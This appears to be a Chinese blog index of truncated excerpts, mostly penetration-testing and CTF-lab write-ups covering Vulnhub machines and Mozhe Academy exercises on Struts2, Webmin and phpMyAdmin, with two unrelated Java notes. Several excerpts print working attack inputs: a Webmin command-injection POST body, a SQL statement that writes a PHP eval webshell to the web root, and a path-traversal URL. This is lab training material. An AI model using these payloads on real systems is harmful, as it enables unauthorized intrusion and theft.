【渗透测试】Vulnhub Five86-1
[【渗透测试】Vulnhub Five86-1]渗透环境环境准备vulnhub靶机Five86-1下载地址(https://www.vulnhub.com/entry/five86-1,417/)
12攻击机:192.168.207.130靶机:192.168.207.137
下载好靶机之后直接使用VMware Workstation Pro虚拟机导入环境,启动即可,将网段设置为NAT模式 目标:获取目标靶机root目录下的flag
开始渗透
一、 获取端口信息1.主机扫描
发现靶机的IP地址为 `192.168.207.137,然后用nmap对靶机进行详细地扫描。
2.端口扫描使用nmap获取目标靶机开放的端口
1nmap -sS -sV -sC -p- 192.168.207.137 -oN nmap_full_scan
发现开启了22端口, OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0) 发现开启了80端口,Apache httpd 2.4.38 ((Debian)) 发现开启了10000端口,MiniServ 1.92 ...
Apache Struts2远程代码执行漏洞(S2-016)复现
Apache Struts2远程代码执行漏洞(S2-016)复现墨者学院漏洞简介:Apache Struts2存在远程代码执行漏洞,攻击者可以将恶意代码放入http报文头部的Content-Disposition的filename字段,通过不恰当的filename字段或者大小超过2G的Content-Length字段来触发异常,进而导致任意代码执行
参考文章:[CVE-2013-2251] Apache Struts 2远程代码执行漏洞复现(第四弹)_mb5ff40cbf8aec1的技术博客_51CTO博客
Apache Struts 2.0.0 至 2.3.15 允许远程攻击者通过带有构建的 (1) action:、(2) redirect: 或 (3) redirectAction: 前缀的参数执行任意 OGNL 表达式。
打开题目靶机
根据文章说的漏洞我们接着给它bp抓包
我们可以
先行测试首页其实就是/index.action,之前版本似乎还会注明有/default.action。先通过BurpSuite传入测试,与先前一样,采用URL编码迎合系统解析 ...
墨者学院 Webmin未经身份验证的远程代码执行
墨者学院 Webmin未经身份验证的远程代码执行(CVE-2019-15107)
了解漏洞后我们打开题目
随便输入用户名和密码
然后抓包
将请求包发送到repeater模块,然后请求/password_change.cgi
post请求的数据改为
payload:
1user=yeyu&pam=1&expired=2&old=ls /&new1=1111&new2=1111
然后我们发包
出现回显,还有key.txt 文件我们 查看
可以查看到
1mozhe232711867abecd641b9aeaf2adb
问题解决
墨者学院 phpMyAdmin后台文件包含分析溯源
墨者学院 phpMyAdmin后台文件包含分析溯源
打开题目
输了一下弱密码root,root,结果直接登陆进了数据库。
百度了一下该漏洞为CVE-2018-12613 PhpMyadmin后台文件包含分析
进入之后界面如下
点击SQL选项界面
输入语句
1select '<?php @eval($_POST[cmd])?> 呜呜呜我太厉害了 ' into outfile '/var/www/html/1.php'
点击右下角执行
出现界面
之后我们蚁剑连接
访问一下1.php(这个时候php代码已经执行啦,直接用蚁剑来连接:准备连接
然后我们到根目录去找到了key.txt
解决完成了
还有一种方法也很快利用文件包含目录穿透来解决的
1http://124.70.71.251:46100/index.php?target=db_datadict.php?/../../../../../key.txt
都可以找到漏洞执行代码。
【渗透测试】Vulnhub zico2
[【渗透测试】Vulnhub zico2]渗透环境环境准备zico2靶场下载地址https://www.vulnhub.com/entry/zico2-1,210/
123攻击机:192.168.207.130靶机:192.168.207.136
12下载好靶机之后直接使用VMware Workstation Pro虚拟机导入环境,启动即可,将网段设置为NAT模式目标:获取目标靶机root目录下的flag
进行渗透一、 获取端口信息1. 主机扫描1arp-scan -l
发现靶机的IP地址为 `192.168.207.136,然后用nmap对靶机进行详细地扫描。
2. 端口扫描1nmap -A -sV -p- --min-parallelism 100 192.168.207.136
12345-A 代表综合性扫描,能收集很多重要的信息-sV 代表扫描主要的服务信息-p- 参数p是指定端口,后面的-代表所有端口。
3.目录查找1dirsearch -u 192.168.207.136
靶机开放了80端口,111端口和53953端口,查一下发现111可能存在漏洞 ...
文件上传总结
文件上传漏洞文件上传漏洞是指由于程序员在对用户文件上传部分的控制不足或者处理缺陷,而导致的用户可以越过其本身权限向服务器上上传可执行的动态脚本文件。这里上传的文件可以是木马,病毒,恶意脚本或者WebShell等。“文件上传”本身没有问题,有问题的是文件上传后,服务器怎么处理、解释文件。如果服务器的处理逻辑做的不够安全,则会导致严重的后果。
webshellWebShell就是以asp、php、jsp或者cgi等网页文件形式存在的一种命令执行环境,也可以将其称之为一种网页后门。攻击者在入侵了一个网站后,通常会将这些asp或php后门文件与网站服务器web目录下正常的网页文件混在一起,然后使用浏览器来访问这些后门,得到一个命令执行环境,以达到控制网站服务器的目的(可以上传下载或者修改文件,操作数据库,执行任意命令等)。 WebShell后门隐蔽较性高,可以轻松穿越防火墙,访问WebShell时不会留下系统日志,只会在网站的web日志中留下一些数据提交记录
一句话木马大全1234567891011121314151617181920212223242526272829303132333435 ...
python pickle中的反序列化漏洞学习复现题目
python pickle中的反序列化漏洞1.介绍漏洞:Python里的反序列化攻击先来看看什么是序列化和反序列化。简单来说,序列化就是把数据结构转换成字节流,这样我们就可以把数据保存到文件里或者通过网络传输。反序列化则是把这些字节流再转换回原来的数据结构。
反序列化攻击的概述反序列化过程有漏洞:如果我们反序列化了一个不可信的数据源,那就可能引发反序列化攻击。攻击者可以在序列化的数据里嵌入恶意代码,当你反序列化这个数据时,这些恶意代码就会被执行,可能会导致数据泄露、系统崩溃,甚至让攻击者远程控制你的系统。
2. Python Pickle模块概述Pickle的基本功能Pickle模块是Python自带的,它主要用来序列化和反序列化Python对象。你可以用Pickle把任何Python对象(包括复杂的数据结构)保存成字节流,然后在需要的时候再加载回来。
Pickle的工作原理
Pickle的工作原理其实很简单。序列化的时候,它会把Python对象转换成字节流,反序列化的时候,它会把字节流还原成Python对象。下面我们来看几个具体的例子。
Pickle的序列化与反序列化序列化
序列化就 ...
【渗透测试】Vulnhub DC 4
[【渗透测试】Vulnhub DC 4]渗透环境环境准备DC-4靶场下载地址https://www.five86.com/downloads/DC-4.zip
123攻击机:192.168.207.130靶机:192.168.207.133
12下载好靶机之后直接使用VMware Workstation Pro虚拟机导入环境,启动即可,将网段设置为NAT模式目标:获取目标靶机root目录下的flag
进行渗透一、 获取端口信息1. 主机扫描1arp-scan -l
继续
2. 端口扫描1nmap -sS -p- 192.168.207.133
3.目录查找1dirsearch -u 192.168.207.133 -e *
没有什么特殊的去看看网站
1192.168.207.133
二. 渗透过程1. 用户登入爆破随便输入用户名和密码,点击登入,用burpsuite抓包
猜测用户名是admin,密码不知道爆破看看
bp抓包
爆破看看使用密码库
密码库可以去这里下载
弱口令密码
爆破结果:
查看回显报文最长的包,得到密码happy,
综上所述:可知道
usern ...
Java常用快捷键
Java常用快捷键常用的我标红了,记住并会使用
以下是idea中的常用快捷键:
123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105代码整体向后缩进:选中多行代码 - 按下tab键代码整体向前缩进:选中多行代码 - 按下shift + tab键Ctrl + N:查找类Ctrl + Shift + N:查找文件Ctrl + Alt + L:格式化代码Ctrl + Alt + O:优化导入Ctrl + Shift + F:全局查找Ctrl + Shift + R:全局替换Ctrl + D:复制当前行Ctrl + X:剪切当前行Ctrl + Shift + U:大小写转换Ctrl + Alt + T:包围代码Ctrl + Alt + V ...
JAVA学习
JAVA 学习Java循环循环结构允许程序在特定条件满足时反复执行某段代码。Java中有三种主要的循环结构:for循环、while循环和do-while循环。
1. for循环for循环通常用于需要明确循环次数的情况。基本语法如下:
123java复制代码for (initialization; condition; update) { // 循环体}
示例12345678910java复制代码public class ForLoopExample { public static void main(String[] args) { // 计算0到9的和 int sum = 0; for (int i = 0; i < 10; i++) { sum += i; } System.out.println("Sum of 0 to 9 is: " + sum); }}
2. ...